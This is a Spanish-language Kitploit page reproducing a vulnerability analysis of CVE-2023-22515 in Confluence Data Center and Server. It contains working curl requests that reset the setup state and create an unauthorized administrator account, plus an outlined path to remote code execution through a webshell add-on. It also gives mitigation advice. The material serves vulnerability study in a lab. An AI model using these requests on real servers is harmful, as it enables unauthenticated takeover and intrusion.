Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-22515 — Análisis detallado y exploit de prueba de concepto para CVE-2023-22515, una vulnerabilidad crítica de control de acceso roto en Atlassian Confluence Data Center y Server, que permite la creación de cuentas de administrador sin autenticación y posible ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/dkq-k/cve-2023-22515
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

Análisis detallado y exploit de prueba de concepto para CVE-2023-22515, una vulnerabilidad crítica de control de acceso roto en Atlassian Confluence Data Center y Server, que permite la creación de cuentas de administrador sin autenticación y posible ejecución remota de código.

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-22515: Informe de análisis de vulnerabilidad de escalada de privilegios en Confluence Data Center & Server

1. Resumen (Overview)

CVE-2023-22515 es una vulnerabilidad crítica de Control de Acceso Roto (Broken Access Control) encontrada en los productos Atlassian Confluence Data Center y Server. Un atacante no autenticado puede reactivar de forma remota el proceso de configuración inicial del servidor, y a través de esto, crear una nueva cuenta de administrador para tomar el control total del sistema.

  • CVE ID: CVE-2023-22515
  • Puntuación CVSS: 10.0 (Crítica)
  • Versiones afectadas: 8.0.0 ~ 8.5.1 (excluyendo algunas versiones)

2. Análisis detallado de la vulnerabilidad (Vulnerability Analysis)

Causa raíz (Root Cause)

El núcleo de esta vulnerabilidad radica en la verificación insuficiente entre el mecanismo de enlace de parámetros del framework XWork2 y la lógica de procesamiento de acciones de Confluence.

Un atacante puede manipular el valor de bootstrapStatusProvider.applicationConfig.setupComplete a false a través de un parámetro URL. Este atributo es una bandera importante que determina si Confluence ha completado la instalación y configuración.

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

Al enviar esta solicitud, el servidor reconoce en memoria que la configuración no está completa. Esto no modifica el archivo de configuración persistente (confluence.cfg.xml), pero cambia el estado en tiempo de ejecución, permitiendo eludir los controles de acceso.

Mecanismo de ataque (Attack Mechanism)

  1. Inicialización del estado de configuración: El atacante accede a un endpoint público como /server-info.action mientras pasa el parámetro bootstrapStatusProvider.applicationConfig.setupComplete=false.
  2. Elusión del control de acceso: El servidor ahora se considera en estado de "instalación", por lo que se eliminan las restricciones de acceso a las páginas de configuración de administrador bajo /setup/*.
  3. Creación de cuenta de administrador: El atacante accede a la página /setup/setupadministrator.action y crea una nueva cuenta de administrador del sistema.
  4. Toma de control del sistema: Inicia sesión con la cuenta de administrador creada y obtiene todos los permisos del sistema. Esto permite acciones maliciosas adicionales como carga de webshell, filtración de datos, despliegue de ransomware, etc.

3. Reproducción de la vulnerabilidad (Reproduction)

Configuración del entorno (Environment Setup)

Se construyó un servidor Confluence de la versión vulnerable (8.5.1) usando Docker.

  • Imagen Docker: atlassian/confluence-server:8.5.1
  • Base de datos: PostgreSQL 14

docker-compose.yml (resumen):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... configuración de DB ...

Ejecución del exploit (Exploitation)

Para evitar problemas de dependencias de Python, se creó y ejecutó un PoC como script Bash usando curl.

Flujo del exploit:

  1. Restablecer el estado de configuración:

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    Resultado: Se devuelve una respuesta de redirección HTTP 302, confirmando que el estado de configuración completada se ha desactivado internamente.

  2. Crear administrador:

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    Resultado: Se intentó crear la cuenta hacked_admin mediante esta solicitud; posteriormente, es posible acceder con esa cuenta desde la página de inicio de sesión.

4. Mitigación (Mitigation)

Aplicación de parche (Patch)

Se debe actualizar inmediatamente a la última versión proporcionada por Atlassian.

  • Versiones corregidas: 8.3.3, 8.4.3, 8.5.2 y superiores

Medida de mitigación temporal (Workaround)

Si no es posible aplicar el parche, se debe bloquear el acceso al endpoint /setup/* a nivel de red (balanceador de carga, WAF, proxy inverso, etc.).

  • URL a bloquear: /setup/*

6. Ataque avanzado: Escenario de RCE (Ejecución Remota de Código)

Un atacante que obtiene privilegios de administrador a través de CVE-2023-22515 puede pasar a la etapa de ejecución de comandos del sistema (RCE).

Resumen

Confluence otorga a los administradores permisos para instalar complementos (add-ons). Un atacante puede abusar de esto cargando un complemento malicioso que incluya funcionalidad de webshell, obteniendo así control sobre el sistema operativo del servidor.

Cadena de ataque (Attack Chain)

  1. Creación de cuenta de administrador (CVE-2023-22515): Obtener privilegios de administrador del sistema mediante el método descrito anteriormente.
  2. Truco de finalización de configuración: Si el servidor está atascado en el 'Modo de configuración', forzar la finalización de la configuración a través de /setup/finishsetup.action (requiere eludir la licencia) o navegar por los menús de administrador accesibles utilizando sesiones existentes.
  3. Carga de complemento malicioso:
    • Menú: Confluence Administration -> Manage Apps -> Upload App
    • Archivo: un archivo .jar que contiene clases Java maliciosas
  4. Ejecución de comandos:
    • Acceder a la URL proporcionada por el complemento cargado (ejemplo: /plugins/servlet/webshell?cmd=id) para ejecutar comandos del sistema.

Limitaciones del entorno de reproducción actual

Este entorno de práctica (Docker) no tiene una licencia válida de Confluence, por lo que no se puede completar la etapa de configuración inicial. Por lo tanto, aunque la solicitud de creación de cuenta de administrador tuvo éxito (redirección 302), el acceso posterior al menú de complementos y la ejecución real de RCE estuvieron limitados. En un entorno de producción real, la licencia está registrada, por lo que RCE es posible de inmediato sin estas limitaciones.

7. Conclusión (Conclusion)

CVE-2023-22515 es una vulnerabilidad muy peligrosa que permite obtener privilegios de administrador sin autenticación. El ataque es posible simplemente manipulando parámetros de URL, lo que hace que la dificultad del ataque sea muy baja. Por lo tanto, las organizaciones que utilizan versiones afectadas deben aplicar parches o medidas de mitigación de inmediato.

Descargar herramienta